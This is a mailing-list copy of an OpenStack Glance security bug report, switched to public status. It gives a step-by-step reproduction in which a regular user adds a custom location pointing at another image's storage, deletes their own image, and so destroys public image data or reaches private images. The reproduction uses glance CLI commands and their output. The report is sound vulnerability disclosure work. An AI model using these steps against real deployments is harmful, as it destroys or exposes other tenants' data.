[Openstack-security] [Bug 1546507] Re: Regular user in non-default non-recommended configuration can delete any image file

Jeremy Stanley fungi at yuggoth.org
Fri Aug 10 15:14:19 UTC 2018


Seeing no objections, I'm switching this to Public status (long
overdue!).

** Information type changed from Private Security to Public

** Tags added: security

** Changed in: ossa
   Importance: Critical => Undecided

-- 
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1546507

Title:
  Regular user in non-default non-recommended configuration can delete
  any image file

Status in Glance:
  Confirmed
Status in Glance liberty series:
  Confirmed
Status in Glance mitaka series:
  Confirmed
Status in Glance newton series:
  Confirmed
Status in Glance ocata series:
  Confirmed
Status in OpenStack Security Advisory:
  Opinion
Status in OpenStack Security Notes:
  New

Bug description:
  This issue is being treated as a potential security risk under
  embargo. Please do not make any public mention of embargoed (private)
  security vulnerabilities before their coordinated publication by the
  OpenStack Vulnerability Management Team in the form of an official
  OpenStack Security Advisory. This includes discussion of the bug or
  associated fixes in public forums such as mailing lists, code review
  systems and bug trackers. Please also avoid private disclosure to
  other individuals not already approved for access to this information,
  and provide this same reminder to those who are made aware of the
  issue prior to publication. All discussion should remain confined to
  this private bug report, and any proposed fixes should be added to the
  bug as attachments.

  Any user can delete any public image data or get access to private
  image just knowing the image id.

  Glance allows to add custom location to image and this behavior is
  really harmful.

  Scenario of deleting image data in Ceph backend with current devstack
  configuration

  1. User gets list of images:
  mfedosin at winter ~ $ glance image-list
  +--------------------------------------+----------------------------+
  | ID                                   | Name                       |
  +--------------------------------------+----------------------------+
  | 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2     |
  | 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM                     |
  | 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker     |
  | 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes |
  +--------------------------------------+----------------------------+

  2. User requests info about public image he wants to delete:
  mfedosin at winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de
  +------------------+----------------------------------------------------------------------------------+
  | Property         | Value                                                                            |
  +------------------+----------------------------------------------------------------------------------+
  | checksum         | ee1eca47dc88f4879d8a229cc70a07c6                                                 |
  | container_format | bare                                                                             |
  | created_at       | 2016-02-11T03:38:09Z                                                             |
  | direct_url       | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-       |
  |                  | 4463cd7038de/snap                                                                |
  | disk_format      | qcow2                                                                            |
  | id               | 2e4b6dca-9700-4715-b81d-4463cd7038de                                             |
  | min_disk         | 0                                                                                |
  | min_ram          | 64                                                                               |
  | name             | TestVM                                                                           |
  | owner            | 1c6cea59a6054372b10acbab8e25e415                                                 |
  | protected        | False                                                                            |
  | size             | 13287936                                                                         |
  | status           | active                                                                           |
  | tags             | []                                                                               |
  | updated_at       | 2016-02-11T03:38:30Z                                                             |
  | virtual_size     | None                                                                             |
  | visibility       | public                                                                           |
  +------------------+----------------------------------------------------------------------------------+

  Optional: User may try to download image file with "glance image-
  download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg"

  3. User copies direct image url: from 'direct_url' or 'locations' field
  rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap

  4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2)
  mfedosin at winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere
  +------------------+--------------------------------------+
  | Property         | Value                                |
  +------------------+--------------------------------------+
  | checksum         | None                                 |
  | container_format | bare                                 |
  | created_at       | 2016-02-17T11:54:41.000000           |
  | deleted          | False                                |
  | deleted_at       | None                                 |
  | disk_format      | qcow2                                |
  | id               | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
  | is_public        | False                                |
  | min_disk         | 0                                    |
  | min_ram          | 0                                    |
  | name             | rerere                               |
  | owner            | fa343a042d2b47cbbeab08cca9913679     |
  | protected        | False                                |
  | size             | 13287936                             |
  | status           | active                               |
  | updated_at       | 2016-02-17T11:54:44.000000           |
  | virtual_size     | None                                 |
  +------------------+--------------------------------------+
  Optional: User may try to verify that image has desired location
  mfedosin at winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
  +------------------+----------------------------------------------------------------------------------+
  | Property         | Value                                                                            |
  +------------------+----------------------------------------------------------------------------------+
  | checksum         | None                                                                             |
  | container_format | bare                                                                             |
  | created_at       | 2016-02-17T11:54:41Z                                                             |
  | direct_url       | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-       |
  |                  | 4463cd7038de/snap                                                                |
  | disk_format      | qcow2                                                                            |
  | id               | b12c6965-c6f8-4272-a8a0-453fc0fc03e2                                             |
  | min_disk         | 0                                                                                |
  | min_ram          | 0                                                                                |
  | name             | rerere                                                                           |
  | owner            | fa343a042d2b47cbbeab08cca9913679                                                 |
  | protected        | False                                                                            |
  | size             | 13287936                                                                         |
  | status           | active                                                                           |
  | tags             | []                                                                               |
  | updated_at       | 2016-02-17T11:54:44Z                                                             |
  | virtual_size     | None                                                                             |
  | visibility       | private                                                                          |
  +------------------+----------------------------------------------------------------------------------+

  5. User deletes his image. Image data will be deleted too.
  glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
  mfedosin at winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
  mfedosin at winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
  404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404)

  6. Trying to access public data will failed after that.
  mfedosin at winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg
  curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file

  HTTP/1.1 204 No Content
  Date: Wed, 17 Feb 2016 12:01:54 GMT
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 0
  X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd

  Traceback (most recent call last):
    File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main
      args.func(client, args)
    File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download
      utils.save_image(body, args.file)
    File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image
      for chunk in data:
    File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__
      self.iterable.close()
  AttributeError: 'NoneType' object has no attribute 'close'
  'NoneType' object has no attribute 'close'

  mfedosin at winter ~ $ glance --version
  1.2.0

  Affected apis:
  all v1 api without any chance to fix it - v1 always allows to set custom locations.
  v2 api when 'show_multiple_locations' is enabled (default - False)

  Affected schemes:
  All, except 'swift+config' and 'file', because custom locations are forbidden for them.

  If user knows private image id he can build and set custom location to
  his personal image, therefore get an access to private data.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1546507/+subscriptions




More information about the Openstack-security mailing list